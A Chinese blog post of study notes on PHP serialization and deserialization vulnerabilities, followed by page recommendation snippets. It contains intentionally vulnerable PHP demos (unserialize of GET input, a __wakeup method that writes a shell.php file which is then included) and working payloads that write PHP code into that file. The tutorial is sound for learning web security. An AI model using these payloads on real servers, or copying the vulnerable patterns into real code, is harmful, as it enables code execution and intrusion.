day5-day6 -php序列化和反序列化

已于 2024-07-21 18:20:13 修改
阅读量233 收藏 9
点赞数 4
文章标签: php 开发语言
于 2024-07-18 09:17:28 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sins_ofdream/article/details/140512905
版权

php序列化和反序列化

1.php序列化基本知识

1)php序列化和反序列化函数

2)php序列化字符串格式

2.php魔术方法

3.漏洞示例

1)字符型的反序列化

<?php
show_source(__FILE__);
$KEY = "test";
$str = $_GET['str'];
if (unserialize($str) === "$KEY")
{
	eval('phpinfo();');
}
else 
	echo 'try it again';
?>

payload: ?str=s:4:"test";          #具体加不加;感觉有时候不确定

image
示例github地址:https://github.com/poemThesky/poemThesky.github.io/blob/81e37af083d62444a41bac00d693d113b23f3640/%E8%AF%BE%E4%BB%B6%E7%9B%B8%E5%85%B3%E4%BE%8B%E9%A2%98/php%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%AE%9E%E4%BE%8B1.php

2)调⽤ wakeup

<?php
show_source(__FILE__);
class test{
public $test;
function __wakeup(){
	$fp = fopen("shell.php","w") ;
	fwrite($fp,$this->test);
	fclose($fp);
	}
}
$class2 = $_GET['ser'];
print_r($class2);
echo "</br>";
$class2_unser = unserialize($class2);
@require "shell.php";
?>

payload脚本:O%3A4%3A%22test%22%3A1%3A%7Bs%3A4%3A%22test%22%3Bs%3A15%3A%22%3C%3F+phpinfo%28%29%3B%3F%3E%22%3B%7D
这里注意一个点,到底要不要url编码具体看题目,也许是浏览器版本有影响?
<?php
class test{
	public $test="<? phpinfo();?>";
	function __wakeup(){
		$fp = fopen("shell.php","w") ;
		fwrite($fp,$this->test);
		fclose($fp);
	}
}
$a = new test();
$b = serialize($a);
echo urlencode($b);
?>

在这里插入图片描述
在这里插入图片描述

github示例二地址:https://github.com/poemThesky/poemThesky.github.io/blob/7b729b7c329a1e447850b37f21704bc07f747104/%E8%AF%BE%E4%BB%B6%E7%9B%B8%E5%85%B3%E4%BE%8B%E9%A2%98/php-unserialize-demo2.php
githubpayload地址:https://github.com/poemThesky/poemThesky.github.io/blob/7b729b7c329a1e447850b37f21704bc07f747104/%E8%AF%BE%E4%BB%B6%E7%9B%B8%E5%85%B3%E4%BE%8B%E9%A2%98/php-unserialize-demo2-payload.php

poemthesky
关注
  • 4
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PHP-序列化反序列化
逍遥云恋
03-27 306
1.5 序列化反序列化PHP中,数组和对象无法保存,如果需要保存就要将数组或对象转换成一个序列。 序列化:将数组或对象转换成一个序列(serialize) 反序列化:将序列化的字符串转换成数组或对象。(unserialize) 1.5.1 数组的序列化反序列化 <?php //数组的序列化 /* $stu=['tom','berry','ketty']; $str=seriali...
第二十二天php反序列化问题
代码审计
03-31 1907
序列化 百度百科上关于序列化的定义是, 将对象的状态信息转换为可以存储或传输的形式的过程。在序列化 期间,对象将其当前状态写入到临时或持久性存储区。以后,可以通过从存储区中读取或反序列化对 象的状态,重新创建该对象。 简单的说,序列化就是把一个对象变成可以传输的字符串,可以以特定的格式在进程之间跨平台、安 全的进行通信。 PHP中的序列化反序列化 PHP反序列化漏洞也叫PHP对象注入,是一个非常常见的漏洞,这种类型的漏洞虽然有些难以利用,但一 旦利用成功就会造成非常危险的后果。漏洞的形成的根本原因是程序没
ctf_show笔记篇(web入门---反序列化
whale_waves的博客
03-19 1657
例如$a = 1 $b = 2, 这时让$b = &$a, 再给$a 重新赋个值 $a = 3, 这个时候$b就会一直跟着$a变化, $a是什么$b就是什么。利用php处理畸形的序列化的处理措施, 当php收到畸形的序列化时, 会因为对此序列化的不放心, 会第一时间处理掉它, 所以能直接让处理他的顺序排在了最前面。这时, 如果传入一个|O:5:"Class"类似于这样的序列化, php就会自动把|前面的当作键名用, 反而会反序列化|后的值。
Day639.序列化反序列化问题 -Java业务开发常见错误
阿昌爱Java
06-06 1683
Hi,来也,今天记录分享学习内容是序列化是把对象转换为字节流的过程,以方便传输或存储。反序列化,则是反过来把字节流转换为对象的过程。在文件 IO问题 的时候,提到字符编码是把字符转换为二进制的过程,至于怎么转换需要由字符集制定规则。同样地,对象的和,也需要由序列化算法制定规则。关于序列化算法,几年前常用的有 、等,但前者不能跨语言,后者性能较差(时间空间开销大);现在 RESTful 应用最常用的是 ,追求性能的 RPC 框架(比如 gRPC)使用 序列化,这 2 种方法都是跨语言的,而且性能不错,应用广
0day 未公开用友-nc-cloud-blobRefClassSea反序列化
weixin_43167326的博客
07-10 1329
用友NCCloud是用友网络科技股份有限公司(简称“用友网络”)推出的一款云端企业管理软件。用友NCCloud提供了全面的企业管理功能,包括财务管理、人力资源管理、供应链管理、采购管理、销售管理等。支持多种业务模式,适用于不同行业和企业规模的需求,帮助企业实现数字化转型和云端化管理。近日,新华三盾山实验室监测到用友官方发布了安全公告,修复了一个存在于用友U8Cloud中的反序列化漏洞,攻击者利用该漏洞可在目标服务器上执行任意代码。
算法学习笔记—-Day31(pandas中时间序列、数据可视化)
12-22
文件中读取日期序列第二部分:pandas数据可视化一.线形图二.柱状图(bar)三.直方图(histogram)四.密度图(kde)五.散布图(scatter)六.散饼图(pie) 第一部分:pandas时间序列 一.python中的时间日期 datetime模块和...
day3-java反序列化&php反序列化靶场&之前漏洞复习
m0_70099896的博客
11-22 961
查看服务器操作系统版本,web中间件,看看是否存在已知的漏洞,比如IIS,APACHE,NGINX的解析漏洞。查看旁站有没有通用性的cms或者其他漏洞,如果存在cms,则可以针对CMS的版本进行相关的漏洞利用。对于一些特殊的网站,还可以尝试社会工程学攻击,比如伪造邮箱链接钓鱼,伪造短信或者电话骗取验证码等等。查看IP,进行IP地址端口扫描,对响应的端口进行漏洞探测,比如:ftp,ssh,弱口令等等。如果确实找到了一些安全的问题则向相关的负责人反馈,提出修复的建议。首先获取网站的域名,查看是否有子域名。
ctf之php序列化,CTF——Web——PHP序列化反序列化
weixin_35126200的博客
04-01 907
PHP 序列化反序列化:1,序列化(串行化):是将变量转换为可保存或传输的字符串的过程;反序列化(反串行化):就是在适当的时候把这个字符串再转化成原来的变量使用。这两个过程结合起来,可以轻松地存储和传输数据,使程序更具维护性。常见的php系列化和反系列化方式主要有:serialize,unserialize;json_encode,json_decode在进行类的序列化时 私有属性 会加 空白...
Day16-30_Day16-30_python_
10-03
- 序列切片和列表解析:高效地操作和筛选序列。 6. **文件操作**: - 打开和关闭文件:`open()`函数的使用,以及`with`语句确保文件安全关闭。 - 读写模式:`read()`, `write()`, `readline()`, `writelines()`...
Java基础知识-day10【缓冲流、转换流、序列化流、Files】.pdf
10-26
序列化流的基本原理是,使用ObjectOutputStream和ObjectInputStream来实现对象的序列化反序列化序列化流可以将对象写出到文件中,或者将文件读取到对象中。这在 JAVA 编程中非常有用,例如,我们可以使用序列...
PHP高效进销存管理系统智能管理库存销售与采购系统小程序源码
2401_84413795的博客
09-02 503
在这个快速发展的时代,企业要想在激烈的市场竞争中脱颖而出,就必须不断提升自身的运营效率和管理水平。高效进销存管理系统正是你实现这一目标的有力武器。它以其智能、高效、便捷的特点,帮助你轻松驾驭库存、销售与采购三大环节,引领你的企业迈向更加辉煌的未来!
DZ主题模板 Discuz迪恩淘宝客购物风格商业版模板
2403_86698467的博客
09-02 510
包括网站首页,论坛首页,论坛列表页,论坛内容页,论坛瀑布流,频道列表页,频道内容页(支持多个)。方便新手老手运营以及后期维护,时尚大气简洁。模板添加了不少处动画效果,增加用户体验和粘度。版本支持:discuzx3.0版本,discuzx3.1版本,discuzx3.2版本。模板有很多细节都有体现,同时对官方模板文件结构和功能位置做了更为优化的设计处理,模板论坛首页,列表页,内容页,以及文章页面数据采用DIY数据读取,Discuz淘宝客网站模板,迪恩淘宝客购物风格商业版模板。
python反序列化
2301_79783285的博客
08-30 1355
pickle序列化:将 Python 对象转换为可以存储或传输的格式。反序列化:将序列化的数据转换回 Python 对象。pickle模块:支持复杂的 Python 对象,但存在安全风险。json模块:支持 JSON 格式,更安全,适用于大多数应用场景。安全性:处理不受信任的数据时,应避免使用pickle。r:只读模式。w:写入模式,会清空原有内容。a:追加模式。b:二进制模式。:读写模式。x:独占创建模式。t:文本模式(默认)。
后端输出二进制数据,前端fetch接受二进制数据,并转化为字符输出
cdcdhj的博客
09-01 561
在这个前端代码中,我们使用fetch API请求PHP脚本,并获取二进制数据。然后,我们将ArrayBuffer转换为字符串,以便在JavaScript中使用。在PHP中,你可以将字符串或其他数据类型转换为二进制数据,并通过HTTP响应发送给前端。
如何优化浏览器缓存
web_geek的博客
09-04 1034
不过您使用的是WordPress,就省事很多,有许多出色的 WordPress 插件可以帮助您设置,大多数好的主机公司也会提供设置合理的默认值,比如Hostease的虚拟主机,在默认设置的基础上,您还可以联系技术支持为您做调整,所以说,选择一个可靠的主机商,对于网站建设来说也是非常重要的。每当用户访问您的网站,他他们的浏览器需要从服务器上下载页面显示所需的资源(图片、CSS、JavaScript 和字体等),这些资源的下载会占用带宽,并需要一定的传输时间。这是一个新文件,因此不存在提供过时文件的风险。
JAVA—网络通信
Hismybestlove的博客
09-05 893
本文是学习网络通信入门和简单了解UDP协议和TCP协议,学习和了解CS架构和简单了解BS架构和HTTP协议
域名解析DNS服务
qq_59349464的博客
09-01 1559
DNS 是互联网上解决网络中机器命名的一种系统。在网络中,一台主机去访问另外一台主机时,必须要 知道目标主机的IP地址,虽然网络上的节点都可以用IP地址来标识,并且可以通过IP地址被访问。但对 于自然人而言,一组组由数字组成的IP地址,是难以被理解和记忆的。于是设计出了域名系统,用一组 有意义的字符来表示某个特定主机或某个网络,再将网络中主机IP地址和域名之间做成一个映射表。
RTX5源码全家桶集成emWin6.40, Modbus主从,含FreeRTOS版, 探讨一种移植第3方组件通用方法以及使用注意事项2024-08-30
Simon223的博客
08-31 595
RTX5源码全家桶集成emWin6.40, Modbus主从,含FreeRTOS版, 探讨一种移植第3方组件的通用方法以及多任务使用注意事项。2、RTX5/FreeRTOS全家桶首期视频,框架设计。3、CMSSIS-RTOS V2封装层教程。6、emWin和全家桶中间件的兼容问题。
中间件解析漏洞
最新发布
m0_73771249的博客
09-05 475
1.在iis的⽹站根⽬录新建⼀个名为x.asp的⽂件2.在x.asp中新建⼀个jpg⽂件。内容为 asp代码3.在外部浏览器中访问windows2003的iis⽹站中的2.jpg 发现asp代码被执⾏4.将2.jpg⽂件放到⽹站根⽬录下访问,发现其中的asp代码没有被解析。由此可⻅.asp⽂件夹中的任意 ⽂件会被当做asp⽂件去执⾏。
Calendar序列化反序列化
05-19
Calendar序列化反序列化可以使用Java的Serializable接口来实现。具体步骤如下: 1. 实现Serializable接口 ```java public class MyCalendar implements Serializable { private Calendar calendar; public My...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值